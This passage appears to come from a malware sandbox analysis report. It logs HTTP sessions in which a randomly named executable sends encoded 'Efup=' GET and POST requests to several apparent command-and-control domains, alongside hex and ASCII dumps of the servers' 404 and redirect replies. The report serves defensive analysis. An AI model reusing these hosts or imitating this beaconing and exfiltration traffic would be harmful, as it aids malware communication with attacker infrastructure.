                                Data Raw: 45 66 75 70 3d 31 6c 74 54 79 62 54 74 70 31 63 72 65 55 53 4d 46 31 79 5a 64 7a 34 64 69 72 37 49 43 34 31 6d 52 45 55 61 66 33 6b 39 6e 45 4f 35 6f 32 35 45 74 52 53 54 32 78 61 4e 35 4a 65 4c 59 71 6c 64 58 42 6e 53 30 4f 4a 4e 37 41 49 7a 67 6d 65 2b 67 31 4d 50 59 4e 68 2f 6c 44 5a 6c 6e 77 56 4a 55 66 33 2b 58 44 54 58 61 7a 32 2b 72 34 46 56 4c 57 72 2f 71 42 44 31 4c 44 4d 39 4b 62 50 7a 66 32 74 47 41 53 43 45 73 36 62 71 4f 67 4d 4b 35 50 4a 66 72 75 76 36 37 63 62 62 57 52 31 47 6e 63 73 31 42 44 4f 5a 45 75 6e 71 39 74 57 6a 73 55 43 78 58 59 32 70 46 48 47 72 7a 61 79 74 34 74 64 30 4d 45 58 49 49 42 4b 49 68 4a 41 30 42 4c 47 31 56 4d 4b 34 71 34 30 79 56 35 50 35 62 4b 63 68 42 35 45 54 57 54 73 4c 6f 48 32 75 6c 31 49 39 6b 78 35 5a 42 2b 32 58 47 4c 52 49 72 65 72 74 46 5a 4c 6c 32 46 77 72 49 33 34 67 2f 34 4d 6f 65 6c 61 4a 48 46 50 69 49 43 6f 36 78 6e 63 56 38 42 36 2b 4b 43 56 48 6d 2b 69 52 4d 75 4d 32 78 65 63 58 46 57 62 39 6c 71 48 50 48 65 77 5a 64 36 77 59 50 70 44 36 55 [TRUNCATED]
                                Data Ascii: Efup=1ltTybTtp1creUSMF1yZdz4dir7IC41mREUaf3k9nEO5o25EtRST2xaN5JeLYqldXBnS0OJN7AIzgme+g1MPYNh/lDZlnwVJUf3+XDTXaz2+r4FVLWr/qBD1LDM9KbPzf2tGASCEs6bqOgMK5PJfruv67cbbWR1Gncs1BDOZEunq9tWjsUCxXY2pFHGrzayt4td0MEXIIBKIhJA0BLG1VMK4q40yV5P5bKchB5ETWTsLoH2ul1I9kx5ZB+2XGLRIrertFZLl2FwrI34g/4MoelaJHFPiICo6xncV8B6+KCVHm+iRMuM2xecXFWb9lqHPHewZd6wYPpD6UJUPOt8d/0gOvEzovi6ArxS2bCBk1TqfqouFF8zczNTZp5xBIBMnk4QSvHjQRqOZ5CzLM/9eEWVzBQzLwtdhCsIJWmO7ozs3uqdv1Du+GlsDCLS1neALqFdIR9zLByBB/DJ3mxijkm4ST7xNcnOu4WEtQ+lUglQ94EI+EUKcZYpE3PRxboYwmCHbiE2Z8it5SPAjyHAmCI+DEY3DY36bHcQMhUkFhKeI4V2qFm+uIlDK69c8gZek9gUMxeXT3NcgCMuIKOHsznyTvJ9EDx0PEi5K8NnG6K0xtlR3CjP5t8K5yVCDDSpY2RfsFEnwOnXAiM69DtxYwo22bU+fDxL8pL2iXT3twwShzu/Oc3B2WVjY+bu8dtyrkMGlpgwfzMcFx5vastO+oCOrXh0WPZah/Y2e6UNHBb4hAlByMdRayKKRZJ0wRMZ3bocQwEEl1pH11WYb40nY89LwXDGj9KfBO+h/WSDry03x6S5Rls9iGWx2hrkjrtBP3laVJG2ayF2lXPvwJ2mXxLwSnEbBcQyPxarKthOOIZ00s1jYQlcRFuk1/5bhlCW+vbraE0HVi/jl7UvaVCFJTeNnonn8ukH2971UyJe39+Dxs+LOOq29S53F2GQYrJC534zikzUC9T683+TZyLBS6EKQPHpa/v8aNQJsSoPX4dEHqPv [TRUNCATED]
                                Jul 3, 2024 18:03:49.909671068 CEST479INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:49 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.849722131.153.148.82805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:51.949928045 CEST349OUTGET /w7zx/?Efup=4nFzxviigBNCR0XnJkvhNhUb0o3qDKAKJVt5c0EBpnWfgFZ7hCzAhg6W/oCSYblqABe344EIzDMItVaOjGR7QKZXmGlK5CURSd3zTznCfgDClaltbyP35QucHh8Re5qnMA==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.marinestoreng.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:03:52.420022964 CEST479INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:52 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.849723203.161.62.199805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:03:57.482176065 CEST606OUTPOST /d5d3/ HTTP/1.1
                                Host: www.zethcraft.info
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.zethcraft.info
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.zethcraft.info/d5d3/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 61 53 7a 2b 53 55 75 50 52 6b 5a 69 4d 6a 6b 4f 4a 57 44 67 31 6b 68 6b 46 4b 64 4a 43 76 79 37 57 57 67 30 33 33 53 66 44 6d 6f 72 51 44 73 53 78 42 31 70 2b 36 67 31 62 79 6d 61 33 76 67 65 71 65 6d 4b 62 2f 30 59 77 6f 58 49 6d 70 4c 57 52 78 54 39 4e 7a 44 67 78 6d 65 6a 4f 65 4f 77 32 65 4d 2f 59 41 67 79 38 70 39 4b 52 31 43 6f 6a 66 2b 48 47 42 58 67 30 77 38 32 6e 5a 64 69 72 69 73 6f 36 79 69 43 79 32 2b 75 48 6a 4e 30 32 64 36 2b 65 6e 57 6f 5a 73 57 76 66 48 67 68 56 68 57 76 2b 39 74 55 37 45 43 34 4b 70 49 78 4f 36 64 36 4c 35 4c 70 75 4a 51 6b 6f 6c 6e 4d 31 44 39 4b 32 62 51 3d
                                Data Ascii: Efup=aSz+SUuPRkZiMjkOJWDg1khkFKdJCvy7WWg033SfDmorQDsSxB1p+6g1byma3vgeqemKb/0YwoXImpLWRxT9NzDgxmejOeOw2eM/YAgy8p9KR1Cojf+HGBXg0w82nZdiriso6yiCy2+uHjN02d6+enWoZsWvfHghVhWv+9tU7EC4KpIxO6d6L5LpuJQkolnM1D9K2bQ=
                                Jul 3, 2024 18:03:58.094567060 CEST533INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:03:57 GMT
                                Server: Apache
                                Content-Length: 389
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.849724203.161.62.199805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:00.012293100 CEST626OUTPOST /d5d3/ HTTP/1.1
                                Host: www.zethcraft.info
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.zethcraft.info
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.zethcraft.info/d5d3/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 61 53 7a 2b 53 55 75 50 52 6b 5a 69 4e 43 55 4f 49 31 62 67 6b 30 68 6e 4b 71 64 4a 49 50 79 2f 57 57 38 30 33 32 6d 31 44 55 38 72 52 68 45 53 77 41 31 70 74 4b 67 31 50 69 6d 44 36 50 67 76 71 65 36 6f 62 37 77 59 77 73 33 49 6d 72 54 57 52 43 36 72 50 6a 44 31 6f 57 65 74 51 75 4f 77 32 65 4d 2f 59 45 49 4d 38 70 6c 4b 52 6c 79 6f 73 65 2b 45 59 78 58 76 6b 51 38 32 77 4a 64 6d 72 69 74 39 36 32 6a 56 79 31 47 75 48 6d 4a 30 32 70 57 78 58 6e 58 6a 55 4d 58 75 65 32 64 57 54 67 48 4c 38 50 31 48 34 45 54 4d 4c 66 6c 62 55 59 56 38 49 35 6a 43 75 4b 34 53 74 53 36 6b 76 67 74 36 6f 4d 48 5a 4c 57 34 4c 53 33 41 4a 4f 61 6b 56 63 51 79 70 6b 44 54 6b
                                Data Ascii: Efup=aSz+SUuPRkZiNCUOI1bgk0hnKqdJIPy/WW8032m1DU8rRhESwA1ptKg1PimD6Pgvqe6ob7wYws3ImrTWRC6rPjD1oWetQuOw2eM/YEIM8plKRlyose+EYxXvkQ82wJdmrit962jVy1GuHmJ02pWxXnXjUMXue2dWTgHL8P1H4ETMLflbUYV8I5jCuK4StS6kvgt6oMHZLW4LS3AJOakVcQypkDTk
                                Jul 3, 2024 18:04:00.605880976 CEST533INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:04:00 GMT
                                Server: Apache
                                Content-Length: 389
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.849725203.161.62.199805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:02.543895960 CEST1643OUTPOST /d5d3/ HTTP/1.1
                                Host: www.zethcraft.info
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.zethcraft.info
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.zethcraft.info/d5d3/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 61 53 7a 2b 53 55 75 50 52 6b 5a 69 4e 43 55 4f 49 31 62 67 6b 30 68 6e 4b 71 64 4a 49 50 79 2f 57 57 38 30 33 32 6d 31 44 55 6b 72 51 53 38 53 78 6a 74 70 38 36 67 31 4d 69 6d 47 36 50 67 32 71 65 79 73 62 37 38 6d 77 75 50 49 6c 49 62 57 58 7a 36 72 47 6a 44 31 67 32 65 67 4f 65 4f 66 32 66 38 37 59 41 73 4d 38 70 6c 4b 52 6d 71 6f 72 50 2b 45 61 78 58 67 30 77 38 71 6e 5a 64 43 72 69 31 74 36 32 6e 46 79 6c 6d 75 47 47 35 30 30 36 75 78 59 6e 58 68 54 4d 57 39 65 32 52 4a 54 67 61 79 38 4f 42 70 34 47 44 4d 47 5a 30 6d 52 4d 45 69 61 2f 76 74 75 64 30 34 69 31 4f 51 6c 67 70 32 76 72 2b 6a 4a 79 34 55 64 55 41 68 48 35 6c 46 59 57 6d 59 75 32 71 5a 69 79 59 68 75 35 2b 67 4f 50 66 7a 58 34 71 6c 49 47 38 4c 56 59 54 4c 42 6b 69 31 56 42 49 2b 65 64 44 57 6e 71 54 6c 66 61 53 50 6e 43 63 63 6e 46 6e 6e 6d 74 6a 57 56 51 63 36 33 47 61 62 44 43 42 6b 72 65 34 48 72 45 74 4f 4d 46 51 6a 54 75 37 64 2b 77 75 78 78 38 2b 5a 65 58 57 6b 4f 4c 42 6e 61 30 72 2b 50 79 32 79 57 79 6a 6f 6f [TRUNCATED]
                                Data Ascii: Efup=aSz+SUuPRkZiNCUOI1bgk0hnKqdJIPy/WW8032m1DUkrQS8Sxjtp86g1MimG6Pg2qeysb78mwuPIlIbWXz6rGjD1g2egOeOf2f87YAsM8plKRmqorP+EaxXg0w8qnZdCri1t62nFylmuGG5006uxYnXhTMW9e2RJTgay8OBp4GDMGZ0mRMEia/vtud04i1OQlgp2vr+jJy4UdUAhH5lFYWmYu2qZiyYhu5+gOPfzX4qlIG8LVYTLBki1VBI+edDWnqTlfaSPnCccnFnnmtjWVQc63GabDCBkre4HrEtOMFQjTu7d+wuxx8+ZeXWkOLBna0r+Py2yWyjooalRqwJRM87NI2g2m2+/7JTg1rocq2Ep5VcKa10KMMa+ABS7JZ6Te2Xpa0ctwGaqtvx+yuuVOGmEbab/YGVAlZXHU2yf78IElM+LKI+5dgURwgLsI1TnTsoXMSzXfqKAQJB+snqUskTANbxTCR6se7jAJ+ukl7OWABpdK1UWo2ypoVD94aLwlqyNg0Ye5NbpL0PQUNl+0EQFZ+NSTc+dMpc/OjR+S3tXlTV8UrYGJpgRQAgAZAS8D0sDbteAmGd2CiSqA4nxruh78L6Svn+L2pO9X3JMdGGtDqwQJnzIERcQv57xwxdMWW1401RRTQtVJ5jh2bKG9blFWSkOuUAPsuFyGthAgIZ07zZDQU9AI9UKOf+58gZfOPadgdYHaVjo0QxK76Rw/EkxzgPk8DHIab3zmeJXx7WWrCd6M5BP9Vvm0R6GAv2xLjISWoQcswtjpvwA19J8sRrWWp1YmEmVCCMy967ThTCyCJSLnXsGm/50WqpV8+XcPenfwva+8saymT/Zo8Ih2WQTXyKgqEKC3AKtBrbOyitFPc2m4d7RzrAPi+KPLM3cpiYZxcroUM83LMbcp0OskDIycF14qyooPkkvtMQxkTA98h2B9OweLbvm/JiRcFiXcaavLUN+nt43Jr8ChN36RdizycrB8IXpc9fCwBqaG4NJn+T [TRUNCATED]
                                Jul 3, 2024 18:04:03.138504982 CEST533INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:04:03 GMT
                                Server: Apache
                                Content-Length: 389
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.849726203.161.62.199805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:05.074975967 CEST346OUTGET /d5d3/?Efup=XQbeRjD/PDdWBh12NU+ykUl2F4dvHc6VXEhqzGSjB3wJSjcs0xwI8Icac1G5+8QpiM7OSYRY7+DwwJfqawKXGWKHnDunR+LM5fl2Yw480JpoJUWygYqvECbW/AkZxLcv1w==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.zethcraft.info
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:04:05.841337919 CEST548INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:04:05 GMT
                                Server: Apache
                                Content-Length: 389
                                Connection: close
                                Content-Type: text/html; charset=utf-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.84972735.214.213.30805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:10.919620037 CEST630OUTPOST /wwqg/ HTTP/1.1
                                Host: www.herplaatsingscoach.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.herplaatsingscoach.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.herplaatsingscoach.com/wwqg/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 52 4e 2b 68 49 52 7a 49 48 6f 6f 64 48 57 69 44 47 38 7a 58 55 65 6d 6f 38 72 4c 49 35 4e 74 49 4b 65 33 6f 43 69 72 75 41 79 79 64 35 59 71 76 2f 76 4d 75 34 33 7a 6d 2b 57 68 33 72 49 57 78 70 62 54 2f 6f 39 38 51 6d 63 38 64 45 47 6c 5a 46 47 6e 72 42 38 34 6d 39 76 67 43 66 63 67 58 75 32 37 65 5a 30 4b 4d 77 43 50 35 42 78 30 38 57 6e 4e 71 47 65 73 79 77 41 2f 4f 65 4d 2f 37 36 42 6a 71 54 33 79 35 47 66 61 76 49 57 71 37 56 2f 38 5a 48 51 65 71 30 36 33 71 6f 2b 53 33 46 63 70 35 39 53 73 52 58 34 67 44 63 34 45 37 48 37 6d 63 6f 37 4f 50 4f 52 63 4b 70 4c 31 4a 4e 66 4e 58 43 72 30 3d
                                Data Ascii: Efup=RN+hIRzIHoodHWiDG8zXUemo8rLI5NtIKe3oCiruAyyd5Yqv/vMu43zm+Wh3rIWxpbT/o98Qmc8dEGlZFGnrB84m9vgCfcgXu27eZ0KMwCP5Bx08WnNqGesywA/OeM/76BjqT3y5GfavIWq7V/8ZHQeq063qo+S3Fcp59SsRX4gDc4E7H7mco7OPORcKpL1JNfNXCr0=
                                Jul 3, 2024 18:04:11.541342974 CEST300INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Wed, 03 Jul 2024 16:04:11 GMT
                                Content-Type: text/plain
                                Content-Length: 24
                                Connection: close
                                Location: https://www.herplaatsingscoach.com/wwqg/
                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                X-Proxy-Cache-Info: DT:1
                                Data Raw: 33 30 31 20 2d 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a
                                Data Ascii: 301 - Moved Permanently


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.84972835.214.213.30805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
